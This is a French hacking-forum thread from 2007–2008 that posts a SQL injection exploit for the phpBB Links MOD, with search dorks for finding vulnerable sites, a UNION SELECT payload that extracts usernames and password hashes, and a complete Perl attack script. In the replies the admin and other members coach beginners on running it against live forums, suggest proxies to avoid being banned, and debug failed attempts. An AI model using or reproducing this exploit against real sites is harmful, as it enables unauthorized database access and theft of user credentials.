phpBB <= 2.0.22 - Links MOD <=v1.2.2 SQL Injection

Moderator: Mod

phpBB <= 2.0.22 - Links MOD <=v1.2.2 SQL Injection

Postby Korigan » Mon Nov 19, 2007 1:18 pm

pour trouver les sites faillibles :
allinurl:links.php?t=search
ou: "Links MOD v1.2.2 by phpBB2.de"


L'exploit en lui même :

SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*



le code en perl :
[code:1:79e0dd12e2]
#!/usr/bin/perl

print q{

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

Bug discovered by Don
Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}

# milw0rm.com [2007-08-31]
[/code:1:79e0dd12e2]
Attention, cet exploit est très connu et de nombreuses protections existent déja.
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby mosquitox » Mon Nov 19, 2007 7:05 pm

yep en plus on se fait ban si on test ça sur un serveur sécurisé ^^ essayer ça en passant par proxy :wink:
User avatar
mosquitox
Projets
 
Posts: 225
Joined: Mon Jul 09, 2007 6:57 pm

Postby jadlegone » Wed Dec 19, 2007 12:51 pm

hehe dsl mais c'est quoi ce charabia?:)
jadlegone
Projets
 
Posts: 4
Joined: Wed Dec 19, 2007 11:24 am
Location: Liban

Postby freerider » Wed Dec 19, 2007 2:27 pm

L'exploit il faut le rajouter derrière l'URL ?
User avatar
freerider
Projets
 
Posts: 6
Joined: Sun Nov 11, 2007 2:55 pm

Postby Korigan » Wed Dec 19, 2007 7:36 pm

C'est un script perl.
Il faut donc le mettre dans un fichier .pl puis l'interpréter avec votre programme perl.
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby mosquitox » Wed Dec 19, 2007 8:34 pm

Active perl est très bien si vous voulez cela ^^ Après il est possible que votre fenêtre dos se ferme très vite après l'exécution du programme sans en avoir les résultats. Alors lancer cmd.exe puis exécuter votre programme depuis là
:wink:
User avatar
mosquitox
Projets
 
Posts: 225
Joined: Mon Jul 09, 2007 6:57 pm

Postby olaf » Tue Jan 08, 2008 6:58 pm

bon j'imagine que l'exploit présenté ci-dessus est dépassé, mais c'est pas grave, pour me familiariser avec la "chose", j'ai choppé active perl, et tenté cet exploit.
J'ai donc crée un fichier .pl, activeperl le reconnait, super...
quand je le lance s'affiche une invit, je rentre l'adresse d'un forum... et là, je ne sais pas quoi faire.
Avez-vous un tuto à ce sujet?
merci
User avatar
olaf
Projets
 
Posts: 72
Joined: Sat Dec 08, 2007 6:02 pm
Location: chez moi

Postby Korigan » Wed Jan 09, 2008 1:05 am

[quote:11d878d32d="olaf"]bon j'imagine que l'exploit présenté ci-dessus est dépassé, mais c'est pas grave, pour me familiariser avec la "chose", j'ai choppé active perl, et tenté cet exploit.
J'ai donc crée un fichier .pl, activeperl le reconnait, super...
quand je le lance s'affiche une invit, je rentre l'adresse d'un forum... et là, je ne sais pas quoi faire.
Avez-vous un tuto à ce sujet?
merci[/quote:11d878d32d]

Que te renvoie le script?
Il est censé te donner un hash MD5.
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby olaf » Wed Jan 09, 2008 8:58 am

je rentre l'adresse du forum et ça me donne ceci :

=> insert directory
=> es: /forum/ - / phpbb2/
=>

je ne sais pas quoi mettre , mais si je tape quelquechose ça me donne encore ceci :

=> user ID
=> number !
=>

et après je tape encore n'importe quoi, et la fenêtre se ferme...
User avatar
olaf
Projets
 
Posts: 72
Joined: Sat Dec 08, 2007 6:02 pm
Location: chez moi

Postby Korigan » Wed Jan 09, 2008 8:36 pm

Tu dois attaquer un forum possédant la faille.
(On aurais du commencer par là)

Ton forum est t'il bien un phpBB2 <=2.0.22 ayant le mod Links <=v1.2.2 ?
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby mosquitox » Thu Jan 10, 2008 6:14 pm

Faites très attention quand à l'utilisation de ce script, il est détecté et vous allez être banni du site :wink:
User avatar
mosquitox
Projets
 
Posts: 225
Joined: Mon Jul 09, 2007 6:57 pm

Postby Ar-S » Mon Mar 03, 2008 2:09 pm

De toute façon ce genre de script est à utiliser avec des pincettes, à defaut de pincettes, de proxy :P
User avatar
Ar-S
Projets
 
Posts: 61
Joined: Fri Feb 22, 2008 6:02 pm
Location: DTC

Postby baltazare » Mon Mar 03, 2008 2:34 pm

Je vais tester^^
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am

Postby baltazare » Tue Mar 04, 2008 2:25 pm

[img:8f4e2e50f7]http://img525.imageshack.us/img525/7280/exploitscreenperliv2.png[/img:8f4e2e50f7]

Il y a donc une erreur dans la ligne 44?

ligne 44 à 47
[code:1:8f4e2e50f7]$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";[/code:1:8f4e2e50f7]


Si un connaisseur de perl peut m'aiguiller.
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am

Postby kmkz » Tue Mar 04, 2008 7:58 pm

yop!
Visiblement l'erreur s'est produite a l'entrée utilisateur <stdin> .Essaye de modifié le script en utilisant le module Warning ( use Warnings; au début du code) pour éventuellement avoir plus d'infos ( meme si ici tu n'en a pas trop l'utilité ^^).

Vérifie l'url car l'erreur viens d'une mauvaise saisie utilisateur a premiere vu.
Et vérifie de bien la rentré correctement , l'erreur classique : "l'exploit ne marche pas " alors qu'il suffit parfois de savoir exactement se que le prog attend exactement comme infos et ça marche nikel.
User avatar
kmkz
Projets
 
Posts: 120
Joined: Wed Feb 06, 2008 1:25 pm
Location: Carcassonne, Toulouse

Next

Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 1 guest

cron